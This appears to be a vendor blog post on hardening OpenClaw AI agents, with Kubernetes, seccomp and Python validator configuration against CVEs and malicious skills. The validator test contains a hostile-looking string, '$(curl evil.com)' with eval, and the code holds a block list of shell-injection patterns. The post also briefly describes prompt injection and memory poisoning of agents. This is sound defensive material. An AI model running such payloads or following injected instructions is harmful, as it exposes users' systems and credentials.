The Agent Governance Paradox: 57% Run Agents in Production. Only 20% Have Governance.
Why traditional governance frameworks collapse under agent autonomy.
SECURITY
Liam McCarthy
Dispatched: Mar 2026
10 min read

135,000+ exposed OpenClaw instances. 36% of ClawHub skills flagged with security flaws. Three critical CVEs that let attackers steal tokens, escalate privileges, and escape sandboxes.
Those numbers come from SecurityScorecard's STRIKE team (February 2026 Shodan scan), Snyk's ToxicSkills audit of 3,984 ClawHub skills, and OpenClaw's own security advisories. If you're running AI agents in production, these are your problems right now.
This post is a threat assessment disguised as a tutorial. We cover what's actually happening in the OpenClaw vulnerability landscape, why traditional container security doesn't address agentic workloads, and how to implement a 4-tier defense strategy using NemoClaw and standard Linux isolation primitives. Each tier includes deployable configuration, validation commands, and honest residual-risk estimates.
A note on NemoClaw: NVIDIA announced NemoClaw at GTC 2026 (March 16) as an open-source enterprise security layer for OpenClaw. It installs the NVIDIA OpenShell runtime in a single command, adding a kernel-level sandbox, an out-of-process policy engine, and a privacy router on top of OpenClaw. NemoClaw is currently in early-access preview – NVIDIA's own docs warn to "expect rough edges" and explicitly state it should not be used in production environments yet. The 4-tier architecture described here draws on NemoClaw's design principles but uses production-ready Linux primitives (network policies, seccomp, read-only filesystems) that you can deploy today regardless of NemoClaw's maturity.
Over the past 90 days, security researchers documented multiple critical CVEs affecting OpenClaw. The three with the highest impact: CVE-2026-25253 (authentication token exfiltration via an attacker-controlled WebSocket server), CVE-2026-32042 (privilege escalation and lateral movement through a shared gateway), and CVE-2026-32048 (sandbox escape via sessions_spawn inheritance failure).
Scale of exposure: SecurityScorecard's STRIKE team found 135,000+ publicly exposed OpenClaw instances in their February 2026 scan, with 15,000 of those vulnerable to remote code execution through CVE-2026-25253 alone. By March, that number had grown past 220,000 exposed instances according to the STRIKE team's live Declawed dashboard, which updates every 15 minutes. (SecurityScorecard blog)
Supply chain risk: Snyk's ToxicSkills study (February 2026) scanned 3,984 skills from ClawHub and skills.sh. Of those, 1,467 (36.82%) had at least one security flaw, including 76 confirmed malicious payloads designed for credential theft, backdoor installation, and data exfiltration. Every confirmed malicious skill combined a code-layer payload with prompt injection – a dual-layer attack strategy that bypasses traditional static analysis. (Snyk ToxicSkills blog)
The threat landscape above reveals a pattern: attacks against agentic systems operate across multiple layers simultaneously. CVE-2026-25253 exploits the network layer. CVE-2026-32048 exploits the process layer. The ToxicSkills dual-layer payloads combine code injection with prompt manipulation. No single defense covers all of these vectors, which is why the architecture below is organized into four independent tiers – each targeting a different point in the attack chain.
But before diving into the tiers, it's worth understanding why standard container security falls short even when correctly configured.
The gap between standard container hardening and agentic workload security comes down to trust assumptions. Traditional security (network isolation, capability dropping, seccomp) assumes the workload inside the container is trustworthy once deployed. AI agents break that assumption in three ways: model outputs become executable instructions, so untrusted input (a poisoned context, an adversarial prompt) can steer runtime behavior; agents load third-party skills after deployment, pulling supply chain risk inside the trust boundary; and agents autonomously spawn processes and open network connections, so a single compromised step can reach well beyond the container it started in.
This is why a multi-tier approach matters. Each tier addresses a different point in the attack chain, and no single tier covers all three threat vectors.
Each tier is independently deployable. Start with Tier 1 (highest impact-to-effort ratio) and add tiers incrementally.
Tier 1: Network Egress Isolation
What it does: Agents run in network namespaces with explicit egress allowlists. No surprise outbound connections. This directly mitigates token exfiltration (CVE-2026-25253) and reduces lateral movement paths.
Setup:
Deploy two Kubernetes NetworkPolicy resources: first, a default-deny egress policy (podSelector: {}, egress: []) that blocks all outbound traffic from agent pods. Then, an allowlist policy that permits egress only to your API gateway on port 8443 and DNS (UDP 53) to kube-system. This ensures agents can only reach explicitly approved destinations.
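A sketch of those two policies (the agents namespace, the openclaw-agent and api-gateway labels, and the selectors below are illustrative assumptions – adjust them to your topology):

```yaml
# Policy 1: default-deny all egress from every pod in the namespace.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: agent-default-deny-egress
  namespace: agents
spec:
  podSelector: {}            # matches every pod in the namespace
  policyTypes: ["Egress"]
  egress: []                 # no rules = all egress denied
---
# Policy 2: allowlist only the API gateway (TCP 8443) and DNS (UDP 53).
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: agent-egress-allowlist
  namespace: agents
spec:
  podSelector:
    matchLabels:
      app: openclaw-agent
  policyTypes: ["Egress"]
  egress:
  - to:
    - podSelector:
        matchLabels:
          app: api-gateway
    ports:
    - protocol: TCP
      port: 8443
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
    ports:
    - protocol: UDP
      port: 53
```

Because NetworkPolicy rules are additive, the allowlist policy only punches holes in the default-deny baseline; anything not explicitly listed stays blocked.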
Validation:
# From inside the agent pod, verify egress is blocked
kubectl exec -it <agent-pod> -- curl -s --max-time 5 \
  https://example.com && echo "FAIL" || echo "PASS"
# Verify allowed destination works
kubectl exec -it <agent-pod> -- curl -s --max-time 5 \
  https://api-gateway:8443/health && echo "PASS" || echo "FAIL"
# Verify DNS works
kubectl exec -it <agent-pod> -- nslookup api-gateway
Why this matters: CVE-2026-25253 relies on the agent UI connecting to an attacker-controlled WebSocket server. If your network policy blocks all egress except your API gateway, the exfiltration channel doesn't exist. Lateral movement (CVE-2026-32042) requires C2 egress – also blocked.
What this tier does NOT cover: Network isolation doesn't prevent privilege escalation within the cluster (CVE-2026-32042 if the attacker is already on the shared gateway), sandbox escape (CVE-2026-32048), prompt injection, or supply chain attacks. Those require Tiers 2-4.
Cost: ~2% CPU overhead for network namespace maintenance. No infrastructure changes beyond Kubernetes network policy support (Calico, Cilium, etc.).
Tier 2: Immutable Root Filesystem
What it does: Agents run with a read-only root filesystem plus ephemeral writable directories. Supply chain attacks that depend on modifying agent code, configuration, or runtime libraries post-deployment are blocked.
Setup:
Run containers with --read-only flag and mount /tmp and /var/tmp as tmpfs with noexec,nosuid,nodev flags. In Kubernetes, set readOnlyRootFilesystem: true, allowPrivilegeEscalation: false, runAsNonRoot: true (uid 1000), and use emptyDir volumes backed by Memory with size limits (1Gi for /tmp, 500Mi for /var/tmp). This ensures persistent state is immutable while ephemeral writes still work.
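A sketch of the corresponding pod spec (the pod name and image are placeholders):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: agent
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
  containers:
  - name: agent
    image: agent:latest
    securityContext:
      readOnlyRootFilesystem: true
      allowPrivilegeEscalation: false
    volumeMounts:
    - name: tmp
      mountPath: /tmp
    - name: var-tmp
      mountPath: /var/tmp
  volumes:
  - name: tmp
    emptyDir:
      medium: Memory        # tmpfs-backed
      sizeLimit: 1Gi
  - name: var-tmp
    emptyDir:
      medium: Memory
      sizeLimit: 500Mi
```

One caveat: the Kubernetes emptyDir API does not expose mount flags, so the noexec/nosuid/nodev options must be enforced at the container runtime (e.g. docker run's --tmpfs flag accepts them directly) or via an admission policy.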
Validation:
# Verify root filesystem is read-only
kubectl exec -it <agent-pod> -- touch /opt/agent/config.yaml \
  2>&1 | grep -q "Read-only" && echo "PASS" || echo "FAIL"
# Verify /tmp is writable but noexec
kubectl exec -it <agent-pod> -- sh -c \
  'cp /bin/ls /tmp/ls && /tmp/ls 2>&1 | grep -q "Permission denied" && echo "PASS: noexec" || echo "FAIL"'
# Verify agent runs as non-root
kubectl exec -it <agent-pod> -- id | grep -q "uid=1000" \
  && echo "PASS" || echo "FAIL"
Why this matters: A malicious skill downloaded from ClawHub can't modify the Python/Node.js runtime, agent code, or configuration files. Compromised agents can write to /tmp (ephemeral, per-request), but persistent state is immutable.
Residual risk: Supply chain attacks at build time (compromised base images, poisoned dependencies baked into the image) are NOT caught by filesystem isolation. Pair with container image scanning (Trivy, Snyk Container) at your CI/CD layer.
Tier 3: Syscall Filtering with seccomp
What it does: Restricts the Linux syscalls available to the agent process. This is the primary mitigation for sandbox escape (CVE-2026-32048) – even if an agent spawns a child process, the child inherits the restricted syscall set.
Implementation:
The following seccomp profile is a minimal allowlist appropriate for a Node.js or Python agent container. Syscalls are grouped by functional category. Every syscall name below is a real Linux kernel syscall.
The seccomp profile uses SCMP_ACT_ERRNO as the default action (deny-by-default) and allowlists syscalls in seven functional groups: File I/O (open, read, write, stat, directory ops), Networking (socket, accept, connect, send/recv), Memory management (mmap, mprotect, brk), Process lifecycle (clone, execve, exit, wait), Event polling (epoll, poll, nanosleep, timers), Signals and threading (futex, kill, sigaction), and Process identity (getpid, getuid, uname, ioctl). The full JSON profile contains approximately 120 individual syscall names across these categories.
Why execve is in the allowlist: Node.js and Python runtimes require execve to start child processes (e.g., node spawning worker threads, pip during initialization, shell-out to git). Removing it breaks most agent runtimes at startup. The compensating controls that prevent execve abuse are: (1) the no_new_privs bit, set via allowPrivilegeEscalation: false in the pod security context, which ensures any execve'd process cannot gain privileges beyond its parent; (2) all capabilities are dropped (drop: ALL), so even if a process is executed, it has no elevated kernel capabilities; and (3) the read-only root filesystem (Tier 2) means there are no attacker-writable binaries to execute in the first place – /tmp is mounted noexec. If your agent runtime does not require execve (e.g., a single-binary Go agent), remove it from the allowlist for a tighter profile.
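An abbreviated sketch of the profile follows. The names shown are a representative subset of each functional group described above, not the full ~120-syscall production allowlist – extend the names array before deploying:

```json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_AARCH64"],
  "syscalls": [
    {
      "action": "SCMP_ACT_ALLOW",
      "names": [
        "open", "openat", "read", "write", "close", "fstat", "stat",
        "lstat", "lseek", "getdents64", "fcntl", "pipe2", "dup3",
        "socket", "accept4", "bind", "listen", "connect",
        "sendto", "recvfrom", "setsockopt", "getsockopt",
        "mmap", "munmap", "mprotect", "brk", "madvise",
        "clone", "execve", "exit", "exit_group", "wait4",
        "epoll_create1", "epoll_ctl", "epoll_wait", "poll", "nanosleep",
        "futex", "rt_sigaction", "rt_sigprocmask", "rt_sigreturn",
        "kill", "tgkill",
        "getpid", "gettid", "getuid", "geteuid", "getgid",
        "uname", "ioctl"
      ]
    }
  ]
}
```

Note that ptrace, process_vm_writev, mount, and unshare are deliberately absent: any call to them hits the SCMP_ACT_ERRNO default and fails with EPERM.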
Save this as agent-seccomp.json and deploy:
# Copy seccomp profile to node
sudo cp agent-seccomp.json \
/var/lib/kubelet/seccomp/agent-seccomp.json
# Apply pod with seccomp + dropped capabilities
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: agent
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: agent-seccomp.json
  containers:
  - name: agent
    image: agent:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
EOF
Validation:
# Verify seccomp profile is loaded
kubectl get pod agent -o \
jsonpath='{.spec.securityContext.seccompProfile}' | jq .
# Verify ptrace is blocked (used in escape techniques)
kubectl exec -it <agent-pod> -- python3 -c \
"import ctypes, os; libc = ctypes.CDLL(None, use_errno=True); \
libc.ptrace(0, 0, 0, 0); print(os.strerror(ctypes.get_errno()))" \
| grep -q "Operation not permitted" && echo "PASS" || echo "FAIL"
# Verify agent still serves requests
kubectl exec -it <agent-pod> -- curl -s \
http://localhost:8080/health && echo "PASS" || echo "FAIL"
# Check all capabilities are dropped
kubectl exec -it <agent-pod> -- cat /proc/1/status | grep CapEff
# Should show 0000000000000000

Why this matters: CVE-2026-32048 exploits sandbox inheritance failure in sessions_spawn. With this seccomp profile, even if an agent spawns a child process, the child inherits the restricted syscall allowlist. The syscalls needed for most escape techniques (ptrace, process_vm_writev, mount, unshare) are not in the allowlist and will return EPERM.
Residual risks this tier doesn't fully address:
These percentages are engineering estimates, not measured probabilities. They reflect the proportion of attack surface that remains after Tier 3 is deployed, based on the threat categories observed in the OpenClaw CVE corpus and Snyk's supply chain research.
Tier 4: Inference Output Validation
What it does: Validates and sanitizes model outputs before they're used as executable instructions. Cryptographically signs skill instructions to detect tampering. This is the application-layer defense against prompt injection and memory poisoning.
Implementation:
The InferenceValidator class provides two layers of defense: Ed25519 signature verification for skill responses (a hard cryptographic boundary that detects any tampering) and regex-based output sanitization that blocks dangerous patterns like command substitution ($(...)), backtick execution, pipe chains, eval/exec calls, and OS/subprocess imports. The sanitizer is domain-aware—shell-domain skills bypass pattern checks since they legitimately use those constructs, while all other skill domains get filtered. Important caveat: the regex sanitizer is defense-in-depth, not a security boundary. Production deployments should layer it with AST-based analysis, sandboxed execution (Tier 3), and dedicated LLM output classifiers.
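A minimal sketch of what such a validator could look like. The class name and method signatures mirror the validation snippets below; the specific pattern list, the `skill_name:payload` message format, and the fail-closed behavior are illustrative assumptions, not a production implementation:

```python
import re


class InferenceValidator:
    """Sketch: verifies Ed25519-signed skill responses and sanitizes
    model output. Assumes raw 32-byte Ed25519 public key at init."""

    # Regex patterns that indicate shell/code injection in model output.
    DANGEROUS_PATTERNS = [
        r"\$\([^)]*\)",                    # command substitution $(...)
        r"`[^`]*`",                        # backtick execution
        r"\|\s*(sh|bash|zsh)\b",           # pipe into a shell
        r"\beval\s*\(",                    # eval(...)
        r"\bexec\s*\(",                    # exec(...)
        r"\b(import\s+(os|subprocess)|from\s+(os|subprocess))\b",
    ]

    def __init__(self, public_key_bytes: bytes):
        self._public_key_bytes = public_key_bytes
        self._patterns = [re.compile(p) for p in self.DANGEROUS_PATTERNS]

    def sanitize_output(self, text: str, domain: str) -> str:
        # Shell-domain skills legitimately use these constructs; all
        # other domains get dangerous patterns redacted.
        if domain == "shell":
            return text
        for pattern in self._patterns:
            text = pattern.sub("[BLOCKED]", text)
        return text

    def validate_skill_response(self, skill_name: str, payload: str,
                                signature: bytes) -> bool:
        # Hard cryptographic boundary: any tampering fails verification.
        # The cryptography package is imported lazily and we fail closed
        # if it is missing or the key/signature is malformed.
        try:
            from cryptography.exceptions import InvalidSignature
            from cryptography.hazmat.primitives.asymmetric.ed25519 import (
                Ed25519PublicKey,
            )
        except ImportError:
            return False
        try:
            key = Ed25519PublicKey.from_public_bytes(self._public_key_bytes)
            key.verify(signature, f"{skill_name}:{payload}".encode())
            return True
        except (InvalidSignature, ValueError):
            return False
```

Redacting matches rather than rejecting the whole response keeps the agent responsive under noisy inputs; for stricter deployments, raise on any match instead.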
Validation:
# Verify dangerous patterns are blocked
python3 -c "
from inference_validator import InferenceValidator
test_public_key = bytes(32)  # placeholder: your Ed25519 public key bytes
v = InferenceValidator(test_public_key)
test = 'Run: \$(curl evil.com) and eval(payload)'
result = v.sanitize_output(test, 'search')
assert '\$(curl' not in result, 'FAIL: cmd sub not blocked'
assert 'eval(' not in result, 'FAIL: eval not blocked'
print('PASS: dangerous patterns blocked')
"
# Verify signature rejection
python3 -c "
from inference_validator import InferenceValidator
test_public_key = bytes(32)  # placeholder: your Ed25519 public key bytes
v = InferenceValidator(test_public_key)
assert not v.validate_skill_response('test', 'tampered', b'bad')
print('PASS: invalid signatures rejected')
"

Why this matters: Prompt injection and memory poisoning operate at the application layer – Tiers 1-3 can't see them. Output validation means even if a model is tricked into generating malicious instructions (via poisoned context, adversarial prompts, or compromised MCP data), those instructions are caught before execution.
Residual risk: Memory poisoning (~15% estimated residual) occurs when an agent's persistent context or fine-tuning data is corrupted. Tier 4 catches malicious outputs but can't detect subtle behavioral drift from poisoned training data. Defending against this requires monitoring and anomaly detection at the model evaluation layer, which is beyond runtime isolation.
Monitoring: Log all signature failures and pattern-match blocks to your SIEM. Set alerts for repeated signature failures from the same skill (possible tampering or key compromise) and for spikes in pattern-match blocks across agents (possible coordinated prompt injection).
Each tier is independent. Deploy incrementally, validate at each step.
Want help mapping this to your stack? If you're running OpenClaw agents in production and want a prioritized deployment plan for your specific infrastructure, book a 30-minute assessment with Reality AI. We'll walk through your topology, identify the highest-risk gaps, and give you a concrete week-by-week rollout. No pitch deck – just architecture.
IBM's Cost of a Data Breach Report 2024 (published July 2024) found the global average cost of a data breach reached $4.88 million – a 10% year-over-year increase. The subsequent 2025 report (published July 2025) showed a decline to $4.44 million, driven by faster breach containment through AI-assisted detection. (IBM 2024 report; IBM 2025 report)
For organizations running AI agent fleets with the vulnerabilities described above, the exposure is real: 15,000 of the 135,000 exposed OpenClaw instances were directly exploitable for RCE.
Here's a simplified risk-reduction model using IBM's $4.88M figure (the higher, pre-AI-defense baseline) as the starting point:
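As a purely illustrative sketch of that arithmetic (the annual breach probabilities below are hypothetical placeholders, not measured rates – substitute estimates from your own threat model):

```python
# Hypothetical inputs for illustration only.
BREACH_COST = 4_880_000        # IBM 2024 global average breach cost (USD)
P_BASELINE = 0.05              # assumed annual breach probability, unhardened
P_HARDENED = 0.01              # assumed probability after all four tiers

# Expected annual loss = probability of breach x average breach cost.
expected_loss_baseline = P_BASELINE * BREACH_COST
expected_loss_hardened = P_HARDENED * BREACH_COST
annual_risk_reduction = expected_loss_baseline - expected_loss_hardened

print(f"Baseline expected annual loss:  ${expected_loss_baseline:,.0f}")
print(f"Hardened expected annual loss:  ${expected_loss_hardened:,.0f}")
print(f"Expected annual risk reduction: ${annual_risk_reduction:,.0f}")
```

Even under these placeholder probabilities, the expected reduction is on the order of a few weeks of engineering cost, which is the comparison the next paragraph makes.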
These are directional estimates, not actuarial calculations. Your actual risk profile depends on your deployment topology, data sensitivity, and threat model. The point: the engineering cost of 4 weeks is small relative to even a fractional probability of a $4.88M breach event.
Need help implementing this for your stack? Reality AI offers hands-on deployment support for enterprise AI security architectures, from agent fleet hardening to compliance documentation. Get in touch to discuss your specific environment, or book a 30-minute assessment to prioritize your deployment roadmap.
This architecture is based on NemoClaw's design principles (announced at NVIDIA GTC 2026, currently in early-access preview) combined with production-tested Linux isolation primitives. Residual risk percentages are engineering estimates based on observed attack patterns in the OpenClaw CVE corpus and Snyk's ToxicSkills research – they are not statistical guarantees. Every CVE description, CVSS score, and external statistic in this post links to its primary source.